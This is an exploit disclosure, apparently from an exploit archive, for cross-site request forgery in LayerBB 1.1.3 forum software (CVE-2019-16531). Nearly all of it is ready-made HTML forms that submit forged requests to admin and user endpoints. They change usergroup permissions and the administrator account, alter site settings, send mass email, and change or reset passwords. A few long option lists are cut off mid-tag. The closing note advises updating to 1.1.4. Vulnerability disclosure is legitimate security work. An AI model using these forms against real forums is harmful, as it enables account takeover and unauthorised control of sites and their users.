# Exploit Title: LayerBB 1.1.3 - Multiple CSRF
# Date: 4/7/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30
# Version: 1.1.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-16531


1. Description:
LayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums.


2. Proof of Concepts:

<!-- Edit Usergroup CSRF -->
<form action="http://localhost/admin/edit_usergroup.php/id/1" method="POST" style="padding: 25px;">
    <label for="g_name">Name</label>
    <input type="text" name="g_name" id="g_name" value="User" class="form-control">
    <label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>
    <textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea>
    <label for="b_style_s">Banner Style Start</label>
    <textarea name="b_style_s" id="b_style_s" class="form-control"><span class="label label -default"></textarea>
    <label for="b_style_e">Banner Style End</label>
    <textarea name="b_style_e" id="b_style_e" class="form-control"></span></textarea>
    <label for="permissions">Permissions</label><br>
    <input type="checkbox" name="permissions[]" value="1" checked=""> view_forum<br><input type="checkbox" name="permissions[]" value="2" checked=""> create_thread<br><input type="checkbox" name="permissions[]" value="3" checked=""> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br>
    <br>
    <input type="checkbox" name="is_staff" value="1"> This Usergroup is staff.
    <br>
    <input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Usergroup CSRF End -->

<!-- Edit User CSRF -->
<form action="http://localhost/admin/edit_user.php/id/1" method="POST" style="padding: 25px;">
    <label for="username">Username</label>
    <input type="text" name="username" id="username" value="Administrator" class="form-control">
    <label for="email">Email Address</label>
    <input type="text" name="email" id="email" value="demo@layerbb.com" class="form-control">
    <label for="usermsg">User Message</label>
    <input type="text" name="usermsg" id="usermsg" value="User" class="form-control">
    <label for="signature">User Signature</label>
    <textarea id="editor" name="signature" class="form-control" style="min-height:250px;"></textarea>
    <label for="disabled">User Activated</label><br>
    <input type="radio" name="disabled" value="0" checked=""> Do Not Change<br>
    <input type="radio" name="disabled" value="0"> Active<br>
    <input type="radio" name="disabled" value="1"> Disabled<br>
    <br>
    <label for="usergroup">Usergroup</label><br>
    <select name="usergroup" id="usergroup" style="width:100%;">
    <option value="4" selected="">Dont Change</option>
    <option value="1">User</option><option value="2">Banned</option><option value="3">Moderator</option><option value="4">Administrator</option>
    </select><br><br>
    <input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit User CSRF End -->

<!-- Edit Category CSRF -->
<form action="http://localhost/admin/edit_category.php/id/1" method="POST" style="padding: 25px;">
    <label for="cat_title">Title</label>
    <input type="text" name="cat_title" id="cat_title" value="First Category" class="form-control">
    <label for="cat_desc">Description</label>
    <textarea name="cat_desc" id="cat_desc" class="form-control">First category on this forum!</textarea>
    <br>
    <label for="allowed_usergroups">Allowed Usergroups</label><br>
    <input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
    <br>
    <input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Category CSRF End -->

<!-- Edit Node CSRF -->
<form action="http://localhost/admin/edit_node.php/id/1" method="POST" style="padding: 25px;">
    <label for="cat_title">Title</label>
    <input type="text" name="node_title" id="cat_title" value="First Node" class="form-control">
    <label for="cat_desc">Description</label>
    <textarea name="node_desc" id="cat_desc" class="form-control">The first node on this forum</textarea>
    <label for="parent">Parent</label><br>
    <select name="node_parent" id="parent" style="width:100%;">
    <option value="1" selected="">First Category</option>
    </select>
    <br>
    <label for="additional_option">Additional Options</label><br>
    <input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label>
    <br>
    <label for="allowed_usergroups">Allowed Usergroups</label><br>
    <input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
    <label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small>
    <textarea name="labels" id="labels" class="form-control"></textarea><br>
    <input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Node CSRF End -->

<!-- System Settings CSRF -->
<form action="http://localhost/admin/general.php" enctype="multipart/form-data" method="POST"><section class="col-lg-12">
    <div class="box box-success">
    <div class="box-header">
    <div class="tab-content" style="padding: 25px;">
    <br>
       <label for="site_name">Board Name</label>
       <input type="text" class="form-control" name="site_name" id="site_name" value="LayerBB Demo">
       <label for="board_email">Board Email</label>
       <input type="text" class="form-control" name="board_email" id="board_email" value="demo@layerbb.com">
       <label for="number_subs">Number of shown subforums</label>
       <input type="text" class="form-control" name="number_subs" id="number_subs" value="3">
       <input type="checkbox" name="register_enable" value="1" id="reg_enable" checked=""> <label for="reg_enable">Enable Registeration</label><br>
       <input type="checkbox" name="post_merge" value="1" id="post_merge" checked=""> <label for="post_merge">Merge Posts (<a href="#" title="Merge consecutive posts by the same user." id="tooltip">?</a>)</label><br>
       <input type="checkbox" name="site_enable" value="1" id="site_enable" checked=""> <label for="site_enable">Forum Enabled (<a href="#" title="Allows you to enable or disable your forums." id="tooltip">?</a>)</label><br>
       <input type="checkbox" name="email_verify" value="1" id="email_verify"> <label for="email_verify">Email Verification (<a href="#" title="Allows you to enable or disable email verification." id="tooltip">?</a>)</label><br>
       <input type="checkbox" name="enable_signatures" value="1" id="enable_signatures" checked=""> <label for="enable_signatures">Allow user signatures (<a href="#" title="Allows you to disable user signatures." id="tooltip">?</a>)</label><br>
       <input type="checkbox" name="enable_pcomments" value="1" id="enable_pcomments" checked=""> <label for="enable_pcomments">Enable Profile Comments (<a href="#" title="Allows you to disable profile comments." id="tooltip">?</a>)</label><br>
       <br>
       <label for="default_language">Default Languge</label><br>
       <select name="default_language" id="Default_language" class="form-control">
       <option value="english" selected="">English</option>
       </select><br>
       <input type="checkbox" name="enable_rtl" value="1" id="enable_rtl"> <label for="enable_rtl">Enable RTL (<a href="#" title="Enable Right-to-left for languages that need RTL" id="tooltip">?</a>)</label><br><br>
       <label for="board_rules">Board Rules</label>
       <span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes. Hyperlinks are not supported!</span>
       <textarea name="board_rules" class="form-control" style="min-height:250px;">- No spamming.</textarea>
       <br>
       <label for="offline_msg">Offline Message</label>
       <span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes.</span>
       <textarea name="offline_msg" class="form-control" style="min-height:250px;"></textarea>
    <br>
      <label for="rcap_public">reCaptcha Public Key</label>
      <input type="text" name="rcap_public" id="rcap_public" class="form-control" value="0">
      <label for="rcap_private">reCaptcha Private Key</label>
      <input type="text" name="rcap_private" id="rcap_private" class="form-control" value="0">
      <input type="checkbox" name="enable_recaptcha" value="1"> Use reCaptcha<br>
    <br>
      <label for="content">Board Signature</label>
      <textarea id="editor" name="board_signature" class="form-control" style="min-height:250px;"></textarea>
      <div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>
    <br>
      <label for="custom_logo">Easy Logo Changer</label>
      <input type="file" name="custom_logo" id="custom_logo" class="form-control">

    </div><br>
  <center><input type="submit" name="update" class="btn btn-default" value="Save Settings"></center><br>
  </div>
  </div></section>
</form>
<!-- System Settings CSRF End -->

<!-- Manage Category CSRF -->
<table class="table table-hover">
     <thead>
       <tr>
          <th style="width:70%">Category</th>
          <th style="width:10%">Order</th>
          <th style="width:20%">Controls</th>
        </tr>
     </thead>
     <tbody>
       <tr>
        <td>
          <strong>test cat</strong><br>
          <small>test cat</small>
        </td>
        <td>
          <form action="http://localhost/admin/manage_category.php" method="POST">
            <input type="hidden" name="cat_id" value="2">
            <input type="text" class="form-control" name="cat_place" value="1">
            <input type="submit" name="change_place" style="display:none;">
          </form>
        </td>
        <td>
          <div class="btn-group">
              <li><a href="http://localhost/admin/edit_category.php/id/2">Edit Category</a></li>
              <li><a href="http://localhost/admin/manage_category.php/delete_category/2">Delete Category</a></li>
          </div>
        </td>
      </tr><tr>
        <td>
          <strong>First Category</strong><br>
          <small>First category on this forum!</small>
        </td>
        <td>
          <form action="http://localhost/admin/manage_category.php" method="POST">
            <input type="hidden" name="cat_id" value="1">
            <input type="text" class="form-control" name="cat_place" value="2">
            <input type="submit" name="change_place" style="display:none;">
          </form>
        </td>
        <td>
          <div class="btn-group">
              <li><a href="http://localhost/admin/edit_category.php/id/1">Edit Category</a></li>
              <li><a href="http://localhost/admin/manage_category.php/delete_category/1">Delete Category</a></li>
          </div>
        </td>
      </tr>
    </tbody>
</table>
<center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center>
<!-- Manage Category CSRF End -->

<!-- Manage Node CSRF -->
<table class="table table-hover">
    <thead>
      <tr>
        <th style="width:70%">Node</th>
        <th style="width:10%">Order</th>
        <th style="width:20%">Controls</th>
      </tr>
    </thead>
    <tbody>
      <tr>
      <td>
        <strong><a href="#" target="_blank">First Node</a></strong><br>
        <small>The first node on this forum</small><br>
        <small>Sub-Forums: </small>
      </td>
      <td>
        <form action="http://localhost/admin/manage_node.php" method="POST">
          <input type="hidden" name="node_id" value="1">
          <input type="text" class="form-control" name="node_place" value="0">
          <input type="submit" name="change_place" style="display:none;">
        </form>
      </td>
      <td>
        <div class="btn-group">
            <li><a href="http://localhost/admin/edit_node.php/id/1">Edit Node</a></li>
            <li><a href="http://localhost/admin/manage_node.php/delete_node/1">Delete Node</a></li>
            <li><a href="http://localhost/admin/manage_node.php/toggle_lock/1">Toggle Lock</a></li>
        </div>
      </td>
    </tr>
    </tbody>
</table>
<center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center>
<!-- Manage Node CSRF End -->

<!-- Mass Mail CSRF -->
<form action="http://localhost/admin/massemail.php" method="POST" style="padding: 25px;">
    <label for="subject">Subject</label>
    <input type="text" name="subject" id="subject" value="" class="form-control">
    <label for="content">Email Content</label>
    <textarea id="editor" name="content" class="form-control" style="min-height:250px;"></textarea><br>
    <div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>
    <input type="submit" name="send" value="Send Email" class="btn btn-default">
</form>
<!-- Mass Mail CSRF End -->

<!-- Navbar CSRF -->
<form method="POST" action="http://localhost/admin/navbar.php">
  <h4 class="modal-title" id="myModalLabel">Editing <b>google</b> Navbar Item</h4>
    <input type="hidden" name="id" value="1">
    <div class="form-group">
      <label for="title">URL Title</label>
      <input type="text" class="form-control" id="title" name="title" value="google">
    </div>
    <div class="form-group">
      <label for="url">URL</label>
      <input type="text" class="form-control" id="url" name="url" value="https://google.com">
    </div>
    <div class="form-group">
      <label for="newpage">Open URL in new page</label>
      <select class="form-control" id="newpage" name="newpage">
        <option value="1">Current - Do Not Change</option>
        <option value="1">Yes</option>
        <option value="0">No</option>
      </select>
    </div>
    <div class="form-group">
      <label for="order">Order</label>
      <input type="text" class="form-control" id="order" name="order" value="1">
    </div>
    <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Navbar CSRF End -->

<!-- New Category CSRF -->
<form action="http://localhost/admin/new_category.php" method="POST" style="padding: 25px;">
   <label for="cat_title">Title</label>
   <input type="text" name="cat_title" id="cat_title" class="form-control">
   <label for="cat_desc">Description</label>
   <textarea name="cat_desc" id="cat_desc" class="form-control"></textarea>
   <br>
   <label for="allowed_usergroups">Allowed Usergroups</label>
   <br>
   <input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
   <br>
   <input type="submit" name="create" value="Create Category" class="btn btn-default">
</form>
<!-- New Category CSRF End -->

<!-- New Node CSRF -->
<form action="http://localhost/admin/new_node.php" method="POST" style="padding: 25px;">
   <label for="node_title">Title</label>
   <input type="text" name="node_title" id="node_title" class="form-control">
   <label for="node_desc">Description</label>
   <textarea name="node_desc" id="node_desc" class="form-control"></textarea>
   <label for="parent">Parent</label><br>
   <select name="node_parent" id="parent">
     <option value="1">First Category</option><option value="&1">&nbsp;&nbsp;&nbsp;&nbsp;-First Node</option>
   </select>
   <br>
   <label for="additional_option">Additional Options</label><br>
   <input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label>
   <br>
   <label for="allowed_usergroups">Allowed Usergroups</label>
   <br>
   <input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
   <label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small>
   <textarea name="labels" id="labels" class="form-control"></textarea><br>
   <input type="submit" name="create" value="Create Node" class="btn btn-default">
</form>
<!-- New Node CSRF End -->

<!-- New Usergroup CSRF End -->
<form action="http://localhost/admin/new_usergroup.php" method="POST" style="padding: 25px;">
    <label for="g_name">Name</label>
    <input type="text" name="g_name" id="g_name" class="form-control">
    <label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>
    <textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea>
    <label for="permissions">Permissions</label><br>
    <input type="checkbox" name="permissions[]" value="1"> view_forum<br><input type="checkbox" name="permissions[]" value="2"> create_thread<br><input type="checkbox" name="permissions[]" value="3"> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br>
    <br>
    <input type="checkbox" name="is_staff" value="1"> This Usergroup is staff.
    <br>
    <input type="submit" name="new" value="Create Usergroup" class="btn btn-default">
</form>
<!-- New Usergroup CSRF End -->

<!-- Profile Fields CSRF -->
<form method="POST" action="http://localhost/admin/profile_fields.php" style="padding: 25px;">
    <input type="hidden" name="id" value="1">
    <div class="form-group">
    <label for="title">Title</label>
    <input type="text" class="form-control" id="title" name="title" value="discord">
    </div>
    <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Profile Fields CSRF End -->

<!-- Sidebar CSRF -->
<form method="POST" action="http://localhost/admin/sidebar.php" style="padding: 25px;">
    <input type="hidden" name="id" value="1">
    <div class="form-group">
      <label for="title">Title</label>
      <input type="text" class="form-control" id="title" name="title" value="Demo Information">
    </div>
    <div class="form-group">
      <label for="content">Content</label>
      <textarea class="form-control" name="content" id="content" style="min-height:250px;"><div class="alert alert-danger" role="alert"> This is the LayerBB Demo Website, you can login using<br /><br /> User: Administrator <br />Pass: admin (Case sensitive)<br /><br />This demo gets refreshed every 24-hours.</div></textarea>
    </div>
    <div class="form-group">
      <label for="style">Style</label>
      <select class="form-control" id="style" name="style">
      <option value="danger">Current - Do Not Change</option>
      <option value="primary">Primary</option>
      <option value="success">Success</option>
      <option value="info">Info</option>
      <option value="warning">Warning</option>
      <option value="danger">Danger</option></select>
    </div>
    <div class="form-group">
      <label for="glyphicon">Glyphicon (Optional)</label>
      <input type="text" class="form-control" id="glyphicon" name="glyphicon" value="alert">
    </div>
    <div class="form-group">
      <label for="order">Order</label>
      <input type="text" class="form-control" id="order" name="order" value="1">
    </div>
  <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Sidebar CSRF End -->

<!-- Edit Threads/Posts CSRF -->
<form id="LAYER_form" action="http://localhost/edit.php/post/1" method="POST" style="padding: 25px;">
    <input id="title" name="title" type="text" value="test"><br>
    <textarea id="editor" name="content" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;">test post</textarea>
    <br>
    <input type="submit" name="edit" value="Edit Post">
</form>
<!-- Edit Threads/Posts CSRF -->

<!-- New Threads/Posts CSRF -->
<form id="LAYER_form" action="http://localhost/new.php/node/1" method="POST" style="padding: 25px;">
  <input type="text" name="title" placeholder="Thread Title..." style="width:100%;" class="col-sm-9 form-control">
  <div class="clearfix"></div>
  <br>
  <textarea id="editor" style="width: 100%; height: 300px; max-width: 100%;" name="content"></textarea>

  <div class="center-block" style="margin-top:5px;">
      <input type="submit" name="create" value="Create Thread">
  </div>

  <br>
  <ul class="nav nav-tabs">
      <li class="active"><a href="#polls" data-toggle="tab">Polls</a></li>
  </ul>
  <div class="tab-content">
      <div class="tab-pane active" id="polls">
           <div class="col-md-6">
               <label for="question">Question</label>
               <input type="text" name="question">
               <label for="answer_1">1. Answer</label>
               <input type="text" name="answer_1" id="answer_1">
               <label for="answer_2">2. Answer</label>
               <input type="text" name="answer_2" id="answer_2">
               <span class="btn btn-primary btn-xs" href="" onclick="plus();"> Add an answer field </span>
           </div>
      </div>
  </div>
</form>
<!-- New Threads/Posts CSRF End -->

<!-- Thread Reply CSRF -->
<form id="LAYER_form" action="http://localhost/reply.php/test.1" method="POST" style="padding: 25px;">
    <textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea>
    <p class="pull-right" style="margin-top:5px;">
        <input type="submit" name="reply" value="Post Reply">
    </p>
</form>
<!-- Thread Reply CSRF End -->

<!-- PM Reply CSRF -->
<form id="%form_id%" action="http://localhost/conversations.php/cmd/reply/id/1" method="POST" style="padding: 25px;">
    <textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea>
    <p class="pull-right" style="margin-top:5px;">
        <input type="submit" name="reply" value="Post Reply">
    </p>
</form>
<!-- PM Reply CSRF End -->

<!-- Report Post CSRF -->
<form action="http://localhost/report.php/post/1" id="LAYER_form" method="POST" style="padding: 25px;">
    <label for="reason">Reason</label>
    <textarea name="reason" style="height:150px;width:100%;min-width:100%;max-width:100%;"></textarea>
    <br>
    <input type="submit" name="report" value="Report">
</form>
<!-- Report Post CSRF End -->

<!-- Edit Profile CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/edit" method="POST" style="padding: 25px;">
    <label for="email">Email</label>
    <input type="text" name="email" id="email" value="demo@layerbb.com">
    <label for="usermsg">User Message</label>
    <input type="text" name="usermsg" id="usermsg" value="User">
    <label for="gender">Gender</label>
    <select id="gender" name="gender"><option value="0" selected="selected">Not telling</option>
    <option value="1">Female</option>
    <option value="2">Male</option></select>
    <label for="timezone">Timezone</label>
    <select id="timezone" name="timezone"><option value="Pacific/Midway">(UTC-11:00) Midway Island</option><option value="Pacific/Samoa">(UTC-11:00) Samoa</option><option value="Pacific/Honolulu">(UTC-10:00) Hawaii</option><option value="US/Alaska">(UTC-09:00) Alaska</option><option value="America/Los_Angeles">(UTC-08:00) Pacific Time (US & Canada)</option><option value="America/Tijuana">(UTC-08:00) Tijuana</option><option value="US/Arizona">(UTC-07:00) Arizona</option><option value="America/Chihuahua">(UTC-07:00) Chihuahua</option><option value="America/Chihuahua">(UTC-07:00) La Paz</option><option value="America/Mazatlan">(UTC-07:00) Mazatlan</option><option value="US/Mountain">(UTC-07:00) Mountain Time (US & Canada)</option><option value="America/Managua">(UTC-06:00) Central America</option><option value="US/Central" selected="selected">(UTC-06:00) Central Time (US & Canada)</option><option value="America/Mexico_City">(UTC-06:00) Guadalajara</option><option value="America/Mexico_City">(UTC-06:00) Mexico City</option><option value="America/Monterrey">(UTC-06:00) Monterrey</option><option value="Canada/Saskatchewan">(UTC-06:00) Saskatchewan</option><option value="America/Bogota">(UTC-05:00) Bogota</option><option value="US/Eastern">(UTC-05:00) Eastern Time (US & Canada)</option><option value="US/East-Indiana">(UTC-05:00) Indiana (East)</option><option value="America/Lima">(UTC-05:00) Lima</option><option value="America/Bogota">(UTC-05:00) Quito</option><option value="Canada/Atlantic">(UTC-04:00) Atlantic Time (Canada)</option><option value="America/Caracas">(UTC-04:30) Caracas</option><option value="America/La_Paz">(UTC-04:00) La Paz</option><option value="America/Santiago">(UTC-04:00) Santiago</option><option value="Canada/Newfoundland">(UTC-03:30) Newfoundland</option><option value="America/Sao_Paulo">(UTC-03:00) Brasilia</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Buenos Aires</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Georgetown</option><option value="America/Godthab">(UTC-03:00) Greenland</option><option value="America/Noronha">(UTC-02:00) Mid-Atlantic</option><option value="Atlantic/Azores">(UTC-01:00) Azores</option><option value="Atlantic/Cape_Verde">(UTC-01:00) Cape Verde Is.</option><option value="Africa/Casablanca">(UTC+00:00) Casablanca</option><option value="Europe/London">(UTC+00:00) Edinburgh</option><option value="Etc/Greenwich">(UTC+00:00) Greenwich Mean Time : Dublin</option><option value="Europe/Lisbon">(UTC+00:00) Lisbon</option><option value="Europe/London">(UTC+00:00) London</option><option value="Africa/Monrovia">(UTC+00:00) Monrovia</option><option value="UTC">(UTC+00:00) UTC</option><option value="Europe/Amsterdam">(UTC+01:00) Amsterdam</option><option value="Europe/Belgrade">(UTC+01:00) Belgrade</option><option value="Europe/Berlin">(UTC+01:00) Berlin</option><option value="Europe/Berlin">(UTC+01:00) Bern</option><option value="Europe/Bratislava">(UTC+01:00) Bratislava</option><option value="Europe/Brussels">(UTC+01:00) Brussels</option><option value="Europe/Budapest">(UTC+01:00) Budapest</option><option value="Europe/Copenhagen">(UTC+01:00) Copenhagen</option><option value="Europe/Ljubljana">(UTC+01:00) Ljubljana</option><option value="Europe/Madrid">(UTC+01:00) Madrid</option><option value="Europe/Paris">(UTC+01:00) Paris</option><option value="Europe/Prague">(UTC+01:00) Prague</option><option value="Europe/Rome">(UTC+01:00) Rome</option><option value="Europe/Sarajevo">(UTC+01:00) Sarajevo</option><option value="Europe/Skopje">(UTC+01:00) Skopje</option><option value="Europe/Stockholm">(UTC+01:00) Stockholm</option><option value="Europe/Vienna">(UTC+01:00) Vienna</option><option value="Europe/Warsaw">(UTC+01:00) Warsaw</option><option value="Africa/Lagos">(UTC+01:00) West Central Africa</option><option value="Europe/Zagreb">(UTC+01:00) Zagreb</option><option value="Europe/Athens">(UTC+02:00) Athens</option><option value="Europe/Bucharest">(UTC+02:00) Bucharest</option><option value="Africa/Cairo">(UTC+02:00) Cairo</option><option value="Africa/H
    <br>
    <label for="location">Location</label>
    <select id="location" name="location"><option value="--" selected="selected">Nothing selected</option><option value="AD">Andorra</option><option value="AE">United Arab Emirates</option><option value="AF">Afghanistan</option><option value="AG">Antigua and Barbuda</option><option value="AI">Anguilla</option><option value="AL">Albania</option><option value="AM">Armenia</option><option value="AO">Angola</option><option value="AQ">Antarctica</option><option value="AR">Argentina</option><option value="AS">American Samoa</option><option value="AT">Austria</option><option value="AU">Australia</option><option value="AW">Aruba</option><option value="AX">Aland Islands</option><option value="AZ">Azerbaijan</option><option value="BA">Bosnia and Herzegovina</option><option value="BB">Barbados</option><option value="BD">Bangladesh</option><option value="BE">Belgium</option><option value="BF">Burkina Faso</option><option value="BG">Bulgaria</option><option value="BH">Bahrain</option><option value="BI">Burundi</option><option value="BJ">Benin</option><option value="BL">Saint Barthélemy</option><option value="BM">Bermuda</option><option value="BN">Brunei Darussalam</option><option value="BO">Bolivia</option><option value="BQ">Bonaire</option><option value="BR">Brazil</option><option value="BS">Bahamas</option><option value="BT">Bhutan</option><option value="BV">Bouvet Island</option><option value="BW">Botswana</option><option value="BY">Belarus</option><option value="BZ">Belize</option><option value="CA">Canada</option><option value="CC">Cocos Islands</option><option value="CD">Congo (the Democratic Republic)</option><option value="CF">Central African Republic</option><option value="CG">Congo</option><option value="CH">Switzerland</option><option value="CI">Cote d'Ivoire</option><option value="CK">Cook Islands</option><option value="CL">Chile</option><option value="CM">Cameroon</option><option value="CN">China</option><option value="CO">Colombia</option><option value="CR">Costa Rica</option><option value="CU">Cuba</option><option value="CV">Cabo Verde</option><option value="CW">Curacao</option><option value="CX">Christmas Island</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DE">Germany</option><option value="DJ">Djibouti</option><option value="DK">Denmark</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="DZ">Algeria</option><option value="EC">Ecuador</option><option value="EE">Estonia</option><option value="EG">Egypt</option><option value="EH">Western Sahara</option><option value="ER">Eritrea</option><option value="ES">Spain</option><option value="ET">Ethiopia</option><option value="FI">Finland</option><option value="FJ">Fiji</option><option value="FK">Falkland Islands</option><option value="FM">Micronesia</option><option value="FO">Faroe Islands</option><option value="FR">France</option><option value="GA">Gabon</option><option value="GB">United Kingdom</option><option value="GD">Grenada</option><option value="GE">Georgia</option><option value="GF">French Guiana</option><option value="GG">Guernsey</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GL">Greenland</option><option value="GM">Gambia</option><option value="GN">Guinea</option><option value="GP">Guadeloupe</option><option value="GQ">Equatorial Guinea</option><option value="GR">Greece</option><option value="GS">South Georgia and the South Sandwich Islands</option><option value="GT">Guatemala</option><option value="GU">Guam</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HK">Hong Kong</option><option value="HM">Heard Island and McDonald Islands</option><option value="HN">Honduras</option><option value="HR">Croatia</option><option value="HT">Haiti</option><option value="HU">Hungary</option><option value="ID">Indonesia</option><option value="IE">Ireland</option><option value="IL">Israel</option><option value="IM">Isle of Man</option><option value="IN">India</option><option value="I
    <br>
    <label for="birthday">Birthday</label>
    <input type="text" name="birthday" id="birthday" value="0000-00-00">
    <span id="helpBlock" class="help-block">In the format of: YYYY-MM-DD</span>
    <label for="editor">About You</label><br>
    <textarea name="about" id="editor" style="min-width: 100%; max-width: 100%; height: 150px;"></textarea>
    <br>
    <div class="panel panel-default">
    <div class="panel-heading">Additional Profile Fields</div>
    <div class="panel-body"></div>
    </div>
    <br>
    <input type="submit" name="edit" value="Save Changes">
</form>
<!-- Edit Profile CSRF End -->

<!-- Edit Signature CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/signature" method="POST" style="padding: 25px;">
    <label for="sig">Signature</label>
    <textarea name="sig" id="editor" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;"></textarea>
    <br><br>
    <input type="submit" name="edit" value="Save Changes">
</form>
<!-- Edit Signature CSRF End -->

<!-- Change Password CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/password" method="POST" style="padding: 35px;">
    <label for="current_password">Current Password</label>
    <input type="password" name="current_password" id="current_password">
    <label for="new_password">New Password</label>
    <input type="password" name="new_password" id="new_password">
    <br><br>
    <input type="submit" name="edit" value="Save Changes">
</form>
<!-- Change Password CSRF End -->

<!-- Forgot Password CSRF -->
<form action="http://localhost/members.php/cmd/forgotpassword" method="POST" id="LAYER_form" style="padding: 25px;">
    <label for="email">Email</label>
    <input type="text" name="email" id="email" class="form-control">
    <br><br>
    <input type="submit" name="forget" value="Send Email" class="btn btn-default">
</form>
<!-- Forgot Password CSRF End -->

<!-- Reset Password CSRF -->
<form action="http://localhost/members.php/cmd/resetpassword" method="POST" id="LAYER_form" style="padding: 25px;">
    <label for="password">Password</label>
    <input type="password" name="password" id="password" class="form-control">
    <label for="a_password">Confirm Password</label>
    <input type="password" name="a_password" id="a_password" class="form-control">
    <br><br>
    <input type="submit" name="reset" value="Reset Password" class="btn btn-default">
</form>
<!-- Reset Password CSRF End -->

<!-- Register Account CSRF -->
<form action="http://localhost/members.php/cmd/register" method="POST" style="padding: 25px;">
    <label for="username">Username</label>
    <input type="text" name="username" value="" id="username" class="form-control">
    <label for="password">Password</label>
    <input type="password" name="password" id="password" class="form-control">
    <label for="a_password">Confirm Password</label>
    <input type="password" name="a_password" id="a_password" class="form-control">
    <label for="email">Email</label>
    <input type="text" name="email" value="" id="email" class="form-control">
    <label for="LayerBB_captcha">Are you a bot?</label><br>
    <img src="http://localhost/public/img/captcha.php" alt="LayerBB Captcha"><br><input type="text" id="LayerBB_captcha" name="LayerBB_captcha">
    <br><br>
    <input type="submit" name="register" value="Register" class="btn btn-default">
    By clicking "Register", you agree to abide by the forum rules located <a href="http://localhost/members.php/cmd/rules">here</a>.
</form>
<!-- Register Account CSRF End -->



3. Solution:
Update to 1.1.4